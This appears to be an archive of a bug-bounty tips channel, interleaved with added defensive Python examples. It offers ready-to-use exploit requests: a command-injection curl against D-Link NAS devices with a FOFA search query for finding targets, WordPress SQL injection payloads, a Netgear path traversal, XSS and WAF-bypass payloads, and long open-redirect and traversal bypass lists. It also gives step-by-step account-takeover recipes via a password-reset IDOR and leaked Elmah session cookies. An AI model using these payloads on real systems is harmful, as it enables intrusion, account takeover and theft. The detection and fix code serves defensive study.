Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Post archive
CVE-2024-10914 (CVSS 9.2): Command Injection Flaw Threatens 61,000+ D-Link NAS Devices The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The name parameter in this script does not adequately sanitize input, allowing for command execution. Exploit:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
Affected Devices:
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08
Search query:
FOFA: app="D_Link-DNS-ShareCenter"
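A defender-side check for the request pattern in this post, added here as an example (it is not part of the original post or of D-Link's code): it parses constructed access-log lines (Combined Log Format is assumed) and flags cgi_user_add requests whose name value, after repeated URL decoding, contains shell metacharacters.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines in Combined Log Format (assumed); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2024:12:00:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512
10.0.0.9 - - [10/Nov/2024:12:00:07 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 88
10.0.0.9 - - [10/Nov/2024:12:00:09 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%2527%3Bid%3B%2527 HTTP/1.1" 200 88
10.0.0.7 - - [10/Nov/2024:12:00:11 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_del&name=alice HTTP/1.1" 200 64
"""

REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Shell metacharacters that never belong in a NAS account name.
SHELL_META = set(";|&`$()<>'\"\n")

def full_decode(value, rounds=3):
    # Undo single and double percent-encoding so the check sees what the CGI script sees.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def query_params(query):
    # Split on '&' only; values stay raw here and are decoded by full_decode later.
    params = {}
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        params.setdefault(unquote(key), []).append(val)
    return params

def is_injection_attempt(target):
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/account_mgr.cgi"):
        return False
    params = query_params(parts.query)
    if "cgi_user_add" not in params.get("cmd", []):
        return False
    return any(SHELL_META & set(full_decode(v)) for v in params.get("name", []))

def scan_log(text):
    # Returns (source IP, decoded request target) for each matching request line.
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m and is_injection_attempt(m.group("target")):
            hits.append((m.group("src"), full_decode(m.group("target"))))
    return hits
```

The second hit shows why decoding is repeated: a double-encoded name passes a single-decode filter but still reaches the script as a quoted shell fragment.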

Bug Bounty tips: IDOR via reset password link
1- Ask for a password reset
2- Click on the link and add a new password
3- Intercept the request with Burp Suite
4- Found the email parameter
5- Replace my email with the victim's email
6- Found that the victim's password was changed.
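The bug in this tip beside its fix, as an added example that is not from the original post: the vulnerable reset handler takes the account from the client-supplied email field, while the fixed one takes it from the server-side token record. The in-memory stores and the hash function are constructed stand-ins.

```python
import hashlib
import secrets
import time

# Constructed in-memory stores for this example; a real application would use its database.
USERS = {"victim@example.com": "old-hash", "attacker@example.com": "old-hash"}
RESET_TOKENS = {}  # sha256(token) -> (email the token was issued for, expiry timestamp)

def hash_pw(password):
    # Stand-in for a real password hash (argon2/bcrypt); enough to see which row changed.
    return hashlib.sha256(password.encode()).hexdigest()

def token_key(token):
    # Store only a digest of the token so a leaked table cannot be replayed.
    return hashlib.sha256(token.encode()).hexdigest()

def issue_reset_token(email, ttl=900):
    # The account is bound to the token at issue time and never taken from the client.
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token_key(token)] = (email, time.time() + ttl)
    return token

def reset_vulnerable(token, email, new_password):
    # The bug from the tip: the token is only checked for existence, and the account to
    # update comes from the email field in the form, which anyone can replace.
    if token_key(token) not in RESET_TOKENS:
        return False
    USERS[email] = hash_pw(new_password)
    return True

def reset_fixed(token, new_password):
    # The fix: the request names no account; the token record decides which one changes,
    # and the token is single-use and expires.
    record = RESET_TOKENS.pop(token_key(token), None)
    if record is None or record[1] < time.time():
        return False
    email, _ = record
    USERS[email] = hash_pw(new_password)
    return True
```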

Applying LLMs & Gen AI to Cybersecurity 🍁
List of resources for everything you need to know about how to build and apply LLMs, even if you don't have a background in data science, software engineering, machine learning, or AI but want to join the GenAI wave.
Link 🔗:- https://start.me/p/9oJvxx/applying-llms-genai-to-cyber-security

Breaking Down Multipart Parsers: File upload validation bypass https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/

Check for Subdomain Takeover Vulnerabilities This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.
subfinder -d target.com -silent | while read sub; do host "$sub"; done | grep "NXDOMAIN"
Replace nasa.gov with your target.

Dorks and JS Files by zseano https://www.youtube.com/watch?v=0jM8dDVifaI

Learn JavaScript that helps you read JS files; it's the most important thing to do. I found a Medium article on it that explains everything, MUST READ.
Part 1: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-1-dd08ed34b5a8
Part 2: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-2-f82164917e7
Part 3: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-3-3b987f24ab27

Reduce Noise in Burp Suite with This Simple Trick! 🔥 💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
If you have any other filters to share, drop them in the comments!

https://github.com/ferreiraklet/jeeves Time Based Blind Injection Scanner

🕷Robofinder
I've developed a Python script that allows you to search for and retrieve historical robots.txt files for any given website using Archive.org. This tool is particularly useful for security researchers and web archivists to discover previously accessible paths or directories that were once listed in a site's robots.txt.
1. Clone the repository and install the required dependencies:
git clone https://github.com/Spix0r/robofinder.git
cd robofinder
pip install -r requirements.txt
2. Run the program by providing a URL with the -u flag:
python3 robofinder.py -u https://example.com
👀 Discover additional commands and options on the GitHub page (don't forget to give it a star ⭐️)
#CyberSecurity #bugbountyTools #bugbounty #Recon #reconnaissance #infosec #Archive #bugbountytips
⚡ Boost The Channel 🕷 https://t.me/bugbounty_tech

👻Scripting with Bash Course📞
What is Bash? Bash is a scripting language used to interact with the operating system, especially on Linux and macOS. It lets you run commands and automate tasks by writing scripts, which are just files containing a series of commands. It's commonly used for things like managing files, running programs, and automating repetitive tasks. It's very simple and easy to learn; I highly recommend learning it to start your automation journey.
Uploaded by @BugSpy💘 Make me admin in your channel to get more followers!! And awesome content for free.

🕵️ How to Leverage Elmah Disclosures for Account Takeover:
1️⃣ Locate the Elmah File: Found an Elmah file on your target? Open it by navigating to /elmah or /elmah.axd.
2️⃣ View Error Logs: Click "Details" on any log entry to reveal the full HTTP request, including headers.
3️⃣ Look for Session Cookies: The details may expose session cookies or internal routes tied to authenticated users.
4️⃣ Attempt Account Access: Use the disclosed session cookies in a request to the target, e.g., http://example[.]com. In many cases, this results in access to internal employee or administrative accounts!

CVE ID : CVE-2024-5522 System : WordPress Type : SQL injection Exploit :
HTML5 Video Player WordPress plugin before 2.5.27
GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -
Another PoC
% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-"
{"code":"not_found","message":"Data not found","data":{"status":404}}
curl 0.01s user 0.02s system 0% cpu 5.760 total

CVE ID : CVE-2024-6646 System : Netgear WN604 Type : Path Traversal Exploit :
GET /downloadFile.php?file=config HTTP/1.1

CVE ID : CVE-2015-7377 System : WordPress Type : Reflected XSS Exploit :
Affects: Pie Register WordPress Plugin 2.0.18
XSS with base64 encoding:
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

SQL Injection CVE-2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips

You can try these effective manual open redirect bypasses:
1. Null-byte injection:
   - /google.com%00/
   - //google.com%00
2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/
4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
   - //google.com@127.0.0.1/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//
8. Octal IP address format:
   - http://0177.0.0.1/
   - http://00177.0000.0000.0001/
9. IP address variants:
   - http://3232235777 (decimal notation of an IP)
   - http://0xC0A80001 (hex notation of an IP)
   - http://192.168.1.1/
10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com
12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/
13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/
14. IPv6 notation:
    - http://[::1]/
    - http://[::ffff:192.168.1.1]/
15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com
16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/
18. Non-standard ports:
    - http://google.com:81/
    - https://google.com:444/
19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/
20. Query parameter obfuscation:
    - //google.com/?q=http://another-site.com/
    - //google.com/?redirect=https://google.com/
21. Using the @ symbol for userinfo:
    - https://admin:password@google.com/
    - http://@google.com
22. Combination of userinfo and traversal:
    - https://admin:password@google.com/../../etc/passwd

Cloudflare #XSS WAF Bypass by @nav1n0x Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 
#cybersec #bugbountytips #infosec

Reflected XSS Akamai WAF bypass in a redirect parameter using HTTP Parameter Pollution and double URL encoding:⚙️
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
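A redirect-target validator that rejects every variant in the open redirect list above and the parameter-pollution plus double-encoding trick in this post, added here as an example (it is code from neither post): it decodes repeatedly, refuses polluted parameters, and allows only single-slash relative paths or an exact allowlisted host. The allowlist entry app.example.com is a constructed assumption.

```python
import re
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example.com"}          # constructed allowlist for the example
HOST_RE = re.compile(r"^[a-z0-9.-]+$")       # plain DNS names only: no brackets, no colons

def full_decode(value, rounds=3):
    # Undo single, double and triple percent-encoding so the policy sees the final bytes.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def redirect_is_safe(values, allowed_hosts=ALLOWED_HOSTS):
    """values: every submitted copy of the redirect parameter, so HPP is visible."""
    if len(values) != 1:                     # parameter pollution: ambiguity is a reject
        return False
    target = full_decode(values[0])
    # Nulls, newlines, tabs, spaces, Unicode separators and overlong UTF-8 (decoded to
    # U+FFFD) all fall outside printable ASCII; '\' is treated as '/' by browsers.
    if not target or any(not 0x21 <= ord(c) <= 0x7E for c in target) or "\\" in target:
        return False
    try:
        parts = urlsplit(target)
        if parts.scheme == "" and parts.netloc == "":
            # Relative target: exactly one leading slash and no dot-segments.
            return target.startswith("/") and not target.startswith("//") \
                and ".." not in target.split("/")
        if parts.scheme not in ("http", "https"):
            return False                     # javascript:, ftp:, data: and friends
        if parts.username is not None or parts.port is not None:
            return False                     # userinfo tricks and non-standard ports
        host = parts.hostname or ""
    except ValueError:                       # malformed IPv6 literal or non-numeric port
        return False
    return bool(HOST_RE.match(host)) and host in allowed_hosts
```

Pass the function the list of all values the framework received for the parameter, not just the first or last one; which copy a WAF inspects and which copy the application uses is exactly the gap the HPP payload relies on.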

A solid XSS payload that bypasses Imperva WAF ⚙️
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
#infosec #cybersec #bugbountytips